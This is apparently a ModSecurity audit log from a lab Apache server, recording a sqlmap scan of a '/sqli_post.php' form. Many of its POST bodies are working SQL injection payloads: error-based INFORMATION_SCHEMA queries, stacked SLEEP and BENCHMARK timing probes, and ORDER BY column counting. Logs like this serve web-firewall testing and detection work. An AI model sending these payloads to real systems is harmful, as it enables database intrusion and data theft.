Stopwatch2: 1493232804445461 2475; combined=12, p1=0, p2=9, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM1cK4AAAAD 192.168.56.102 49538 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 242
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%20AND%20%28SELECT%201457%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716b767171%2C%28SELECT%20%28ELT%281457%3D1457%2C1%29%29%29%2C0x716a787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 641
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804452446 2792 (- - -)
Stopwatch2: 1493232804452446 2792; combined=11, p1=0, p2=8, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM5ZCEAAAAF 192.168.56.102 49540 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 105
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=%28SELECT%20CONCAT%280x716b767171%2C%28SELECT%20%28ELT%286218%3D6218%2C1%29%29%29%2C0x716a787a71%29%29
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 508
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804459829 2444 (- - -)
Stopwatch2: 1493232804459829 2444; combined=12, p1=1, p2=9, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM2g9wAAAAE 192.168.56.102 49542 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 4
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804472913 9779 (- - -)
Stopwatch2: 1493232804472913 9779; combined=49, p1=1, p2=45, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM02AoAAAAC 192.168.56.102 49544 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 4
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804486899 3196 (- - -)
Stopwatch2: 1493232804486899 3196; combined=17, p1=1, p2=12, p3=0, p4=0, p5=4, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMzHvMAAAAB 192.168.56.102 49546 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 4
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804491263 2628 (- - -)
Stopwatch2: 1493232804491263 2628; combined=12, p1=1, p2=9, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMySF4AAAAA 192.168.56.102 49548 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 4
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804494810 2845 (- - -)
Stopwatch2: 1493232804494810 2845; combined=13, p1=0, p2=9, p3=0, p4=0, p5=3, sr=0, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM1cK8AAAAD 192.168.56.102 49550 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 4
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804498574 2775 (- - -)
Stopwatch2: 1493232804498574 2775; combined=11, p1=0, p2=9, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM5ZCIAAAAF 192.168.56.102 49552 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 4
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804504125 14308 (- - -)
Stopwatch2: 1493232804504125 14308; combined=14, p1=0, p2=10, p3=0, p4=0, p5=3, sr=0, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM2g90AAAAE 192.168.56.102 49556 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 4
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804521442 8923 (- - -)
Stopwatch2: 1493232804521442 8923; combined=14, p1=0, p2=11, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMzHvQAAAAB 192.168.56.102 49554 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 4
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804526720 6420 (- - -)
Stopwatch2: 1493232804526720 6420; combined=15, p1=1, p2=11, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM02AsAAAAC 192.168.56.102 49558 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 4
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 584
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804531714 3001 (- - -)
Stopwatch2: 1493232804531714 3001; combined=12, p1=1, p2=9, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMySF8AAAAA 192.168.56.102 49560 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 31
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%3BSELECT%20SLEEP%285%29%23
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 579
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804538452 2326 (- - -)
Stopwatch2: 1493232804538452 2326; combined=14, p1=0, p2=12, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM1cLAAAAAD 192.168.56.102 49562 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 28
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%3BSELECT%20SLEEP%285%29
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 578
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804544455 2316 (- - -)
Stopwatch2: 1493232804544455 2316; combined=14, p1=0, p2=12, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM5ZCMAAAAF 192.168.56.102 49564 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 72
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29btLq%29%23
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 593
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804549636 6125 (- - -)
Stopwatch2: 1493232804549636 6125; combined=16, p1=1, p2=11, p3=0, p4=0, p5=4, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM2g94AAAAE 192.168.56.102 49566 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 69
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29Iood%29
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 590
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804558489 4133 (- - -)
Stopwatch2: 1493232804558489 4133; combined=15, p1=0, p2=11, p3=0, p4=0, p5=3, sr=0, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABMzHvUAAAAB 192.168.56.102 49568 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 63
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x79524470%29%29%23
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 606
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804564080 2595 (- - -)
Stopwatch2: 1493232804564080 2595; combined=11, p1=0, p2=9, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--4bf5ea7b-A--
[26/Apr/2017:14:53:24 --0400] WQDspH8AAQEAABM02AwAAAAC 192.168.56.102 49570 192.168.56.101 80
--4bf5ea7b-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 60
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--4bf5ea7b-C--
id=1%3BSELECT%20BENCHMARK%285000000%2CMD5%280x41486c73%29%29
--4bf5ea7b-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 603
Connection: close
Content-Type: text/html; charset=UTF-8

--4bf5ea7b-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804577561 3257 (- - -)
Stopwatch2: 1493232804577561 3257; combined=23, p1=1, p2=18, p3=0, p4=0, p5=3, sr=0, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--4bf5ea7b-Z--

--36e59844-A--
[26/Apr/2017:14:53:29 --0400] WQDspH8AAQEAABMySGAAAAAA 192.168.56.102 49572 192.168.56.101 80
--36e59844-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 25
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--36e59844-C--
id=1%20AND%20SLEEP%285%29
--36e59844-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 468
Connection: close
Content-Type: text/html; charset=UTF-8

--36e59844-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232804585839 5003333 (- - -)
Stopwatch2: 1493232804585839 5003333; combined=14, p1=0, p2=11, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--36e59844-Z--

--36e59844-A--
[26/Apr/2017:14:53:29 --0400] WQDsqX8AAQEAABM1cLEAAAAD 192.168.56.102 49574 192.168.56.101 80
--36e59844-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 25
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--36e59844-C--
id=1%20AND%20SLEEP%280%29
--36e59844-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 469
Connection: close
Content-Type: text/html; charset=UTF-8

--36e59844-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232809590739 2840 (- - -)
Stopwatch2: 1493232809590739 2840; combined=12, p1=1, p2=9, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--36e59844-Z--

--850e7d4d-A--
[26/Apr/2017:14:53:34 --0400] WQDsqX8AAQEAABM5ZCQAAAAF 192.168.56.102 49576 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 25
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20AND%20SLEEP%285%29
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 468
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232809594632 5003254 (- - -)
Stopwatch2: 1493232809594632 5003254; combined=13, p1=0, p2=9, p3=0, p4=0, p5=4, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

--850e7d4d-A--
[26/Apr/2017:14:53:34 --0400] WQDsrn8AAQEAABM2g98AAAAE 192.168.56.102 49578 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 30
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20ORDER%20BY%201--%20KFSZ
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 603
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232814603574 4850 (- - -)
Stopwatch2: 1493232814603574 4850; combined=12, p1=0, p2=10, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

--850e7d4d-A--
[26/Apr/2017:14:53:34 --0400] WQDsrn8AAQEAABMzHvYAAAAB 192.168.56.102 49580 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 33
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20ORDER%20BY%202890--%20zZdL
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 529
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232814612705 2543 (- - -)
Stopwatch2: 1493232814612705 2543; combined=14, p1=0, p2=12, p3=0, p4=0, p5=2, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

--850e7d4d-A--
[26/Apr/2017:14:53:34 --0400] WQDsrn8AAQEAABM02A0AAAAC 192.168.56.102 49582 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 31
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20ORDER%20BY%2010--%20QUFe
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 526
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232814617748 3521 (- - -)
Stopwatch2: 1493232814617748 3521; combined=19, p1=1, p2=15, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

--850e7d4d-A--
[26/Apr/2017:14:53:34 --0400] WQDsrn8AAQEAABMySGEAAAAA 192.168.56.102 49584 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 30
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20ORDER%20BY%206--%20VBKi
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 603
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232814624832 3522 (- - -)
Stopwatch2: 1493232814624832 3522; combined=16, p1=1, p2=12, p3=0, p4=0, p5=3, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

--850e7d4d-A--
[26/Apr/2017:14:53:34 --0400] WQDsrn8AAQEAABM1cLIAAAAD 192.168.56.102 49586 192.168.56.101 80
--850e7d4d-B--
POST /sqli_post.php HTTP/1.1
Content-Length: 30
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.1.4#stable (http://sqlmap.org)
Host: 192.168.56.101
Referer: http://192.168.56.101:80/sqli_post.php
Content-Type: application/x-www-form-urlencoded; charset=utf-8

--850e7d4d-C--
id=1%20ORDER%20BY%208--%20ovzg
--850e7d4d-F--
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 525
Connection: close
Content-Type: text/html; charset=UTF-8

--850e7d4d-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1493232814632864 3728 (- - -)
Stopwatch2: 1493232814632864 3728; combined=15, p1=1, p2=10, p3=0, p4=0, p5=4, sr=0, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.18 (Ubuntu)
Engine-Mode: "ENABLED"

--850e7d4d-Z--

--850e7d4d-A--
